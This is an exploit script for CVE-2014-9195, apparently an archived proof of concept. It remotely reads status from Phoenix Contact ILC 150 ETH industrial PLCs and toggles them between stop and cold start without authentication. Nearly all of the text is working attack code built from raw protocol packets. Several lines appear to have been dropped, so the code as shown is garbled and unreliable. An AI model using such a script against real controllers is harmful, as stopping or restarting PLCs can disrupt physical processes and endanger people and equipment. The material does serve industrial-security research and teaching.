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Phoenix Contact ILC 150 ETH PLC Remote Control Script
来源:tijl[dot]deneut[at]howest[dot]be 作者:Photubias 发布时间:2015-05-22  
#! /usr/bin/env python
    # Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script
    # Date: 2015-05-19
    # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be
    # Version: ALL FW VERSIONS
    # Tested on: Python runs on Windows, Linux
    # CVE : CVE-2014-9195
    Copyright 2015 Photubias(c)
    Written for Howest(c) University College
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    GNU General Public License for more details.
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
File name ControlPLC.py
written by tijl[dot]deneut[at]howest[dot]be
This POC will print out the current status of the PLC, continuously every 0.1 second, after 3 seconds it reverts (start becomes stop, stop becomes cold start), and stops after 5 seconds
Works on ILC 15x ETH, partly on RFC 43x, partly on ILC 39x
import sys, socket, binascii, time, os, select, re
## Defining Functions First
def send_and_recv(s,size,strdata):
    data = binascii.unhexlify(strdata) ## Convert to real HEX (\x00\x00 ...)
    ret = s.recv(4096)
    return ret
def doAction(s,strdata):
    ret = send_and_recv(s,1000,strdata)
    # In official state these are send, they do not seem to be needed
    ret = send_and_recv(s,1000,'010002000000020003000100000000000840')
    return ret
def initMonitor(s):
def is_ipv4(ip):
    match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip)
    if not match:
        return False
    quad = []
    for number in match.groups():
    if quad[0] < 1:
        return False
    for number in quad:
        if number > 255 or number < 0:
            return False
    return True
##### The Actual Program
if not len(sys.argv) == 2:
        IP = raw_input("Please enter the IPv4 address of the Phoenix PLC: ")
        IP = sys.argv[1]
if not is_ipv4(IP):
    print "Please go read RFC 791 and then use a legitimate IPv4 address."
## - initialization, this will get the PLC type, Firmware version, build date & time
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print 'Initializing PLC'
print '----------------'
code = send_and_recv(s,1000,'0101001a005e000000000003000c494245544830314e305f4d00').encode('hex')[34:36]
send_and_recv(s,1000,'01050016005f000008ef00' + code + '00000022000402950000')
ret = send_and_recv(s,1000,'0106000e00610000881100' + code + '0400')
print 'PLC Type  = ' + ret[30:50]
print 'Firmware  = ' + ret[66:70]
print 'Build     = ' + ret[79:100]
send_and_recv(s,1000,'0105002e00630000000000' + code + '00000023001c02b0000c0000055b4433325d0b466c617368436865636b3101310000')
send_and_recv(s,1000,'0106000e0065ffffff0f00' + code + '0400')
send_and_recv(s,1000,'010500160067000008ef00' + code + '00000024000402950000')
send_and_recv(s,1000,'0106000e0069ffffff0f00' + code + '0400')
send_and_recv(s,1000,'0102000c006bffffff0f00' + code)
print 'Initialization done'
print '-------------------\r\n'
print 'Will now print the PLC state and reverse it after 3 seconds'
raw_input('Press [Enter] to continue')
########## CONTROL PHASE ####### Start monitoring with loop on port 41100
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# First init phase (sending things like 'Ade.Remoting.Services.IProConOSControlService2' and 'Ade.Remoting.Services.ISimpleFileAccessService3', 21 packets)
# Query packet
packet1 = '010002000000080003000300000000000200000002400b40'
# Keepalive packet
packet2 = '0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600'
## The loop keepalive and query status loop (2 x keepalive, one time query):
i = 0
state = 'On'
running = 0
stopme = 0
startme = 0
while True:
    i += 1
    ## Keep Alive
    ## Possible actions (like stop/start) should be sent now before the query state
    if (state == 'Running' and stopme):
        print 'Sending Stop'
        startme = stopme = 0
    elif (state == 'Stop' and startme):
        print 'Sending COLD Start'
        ## This is the COLD start: doAction(s,'010002000000020001000600000000000100')
        ## This is the WARM start: doAction(s,'010002000000020001000600000000000200')
        ## This is the HOT  start: doAction(s,'010002000000020001000600000000000300')
        startme = stopme = 0   
    ## Query Status
    ret = send_and_recv(s,1000,packet1).encode('hex')
    if ret[48:50] == '03':
        state = 'Running'
    elif ret[48:50] == '07':
        state = 'Stop'
    elif ret[48:50] == '00':
        state = 'On'
        print 'State unknown, found code: '+ret.encode('hex')[48:50]
    print 'Current PLC state: '+state
    ## Maintaining the LOOP
    if i == 50:
#   '''
    if i == 30:
        if state == 'Running':
            stopme = 1
            startme = 1
raw_input('All done, press [Enter] to exit')

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